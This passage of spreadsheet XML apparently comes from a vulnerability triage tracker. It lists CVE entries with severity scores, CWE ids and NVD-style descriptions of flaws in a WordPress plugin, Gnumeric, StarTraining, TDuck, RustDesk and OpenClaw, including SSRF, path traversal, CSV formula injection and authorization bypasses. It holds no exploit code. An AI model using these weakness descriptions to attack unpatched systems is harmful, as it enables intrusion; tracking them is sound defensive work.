          <t>The Asset CleanUp: Page Speed Booster plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.4.0.5 via the 'page_url' parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This vulnerability is only reachable when the plugin's dom_get_type setting has been configured to 'wp_remote_post' by an administrator.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12037</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97222</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>A heap use-after-free flaw was found in Gnumeric. When a user opens a crafted Gnumeric workbook containing a malformed SheetObjectComponent element, the XML parser can dereference a freed sheet-object component, causing Gnumeric to crash.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97222</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97877</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-255, CWE-259</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in zhistaredu StarTraining up to 3.8.1. This issue affects the function UserLoginService.createToken of the file application.yml of the component JWT Token Handler. This manipulation of the argument user_id/company_id causes use of hard-coded password. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97877</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97878</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in zhistaredu StarTraining up to 3.8.1. Impacted is the function anonymous of the file /druid/index.html of the component Druid Console. Such manipulation leads to missing authentication. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97878</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97879</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in zhistaredu StarTraining up to 3.8.1. The affected element is an unknown function of the file SecurityConfig.java of the component api-docs Endpoint. Performing a manipulation results in missing authentication. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97879</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100303</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 lacks authorization checks on FormThemeController write endpoints for global form themes and categories. Authenticated non-admin users can add, modify, or delete themes and theme categories affecting forms owned by other users.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100303</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100388</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>RustDesk versions before 1.5.0 fail to properly validate file transfer permissions on incoming file clipboard messages in the Cliprdr message handler on Linux and macOS. Authenticated remote peers with disabled file transfer permissions can place files onto the host clipboard and retrieve copied files and contents from the process-wide clipboard cache.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100388</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100524</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in the extensions manager that allows attackers to perform state-changing actions without anti-CSRF token validation. Attackers can craft links or embed images to force administrators to install, update, pause, or unpause extensions by tricking them into visiting a malicious page while authenticated.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100524</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100528</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 could send third-party provider credentials to the wrong endpoint. In affected versions, when a third-party provider uses an OpenAI-compatible API and the resolved model metadata lacks a concrete base URL, a pinned session that continues after a model configuration hot reload retains that provider's credential while the OpenAI SDK selects its own default endpoint. A resulting request could disclose the configured third-party provider credential to an unrelated provider endpoint and fail with a misleading authentication error. Operators who observed this condition should rotate the affected credential. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100528</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100549</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a path traversal vulnerability in QQBot voice attachment handling where filenames are decoded twice, allowing encoded traversal segments to reappear after sanitization. Attackers can supply crafted voice attachments that write files outside the intended staging directory to other process-writable locations.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100549</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100550</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains an access-control bypass in the Microsoft Teams integration. When groupPolicy is set to allowlist, a missing or unsupported configured access group produces a denied group-resolution result that is not rejected by the final message-admission check, so a Teams member who is not on the allowlist can still trigger the configured agent despite the administrator's group boundary. The impact depends on the conversations, tools, and data available to that agent. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100550</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100562</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in the sessions.create endpoint that allows operator.write callers to modify session configurations reserved for operator.admin scope. Attackers with write-scoped credentials can change existing session model, provider, thinking level, and auth-profile settings to redirect traffic and bypass administrative access controls.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100562</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100563</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 does not neutralize leading characters that spreadsheet applications interpret as formulas when the Control UI exports session data to CSV. Although session labels were quoted as CSV text, a lower-trust participant who can influence a session label or the first user message can place a formula-like cell in the Usage export; if an operator opens that export in a spreadsheet application with formula evaluation enabled, the cell may be evaluated with the permissions of the spreadsheet user. OpenClaw itself does not evaluate the formula, and practical impact depends on the spreadsheet application's security settings. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100563</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100564</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to neutralize spreadsheet formula characters in participant display names within attendance CSV exports. Attackers can inject formula-like cells that execute with spreadsheet user permissions when the export is opened in formula-enabled applications.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100564</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100576</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a server-side request forgery vulnerability in browser wait predicates that allows attackers to bypass SSRF protections by reaching blocked destinations. Attackers can use the wait --fn function against an existing browser session to request loopback or private destinations without navigation checks applied to other browser actions.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100576</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100593</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 does not enforce the documented owner-only requirement for persistent `/activation` policy changes in group channels. An authorized non-owner channel sender can change whether the agent requires mention-based activation, causing the agent to respond more broadly in the group (exposing its responses to additional group traffic) or suppressing expected activation behavior until an owner restores the intended setting. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100593</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93366</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
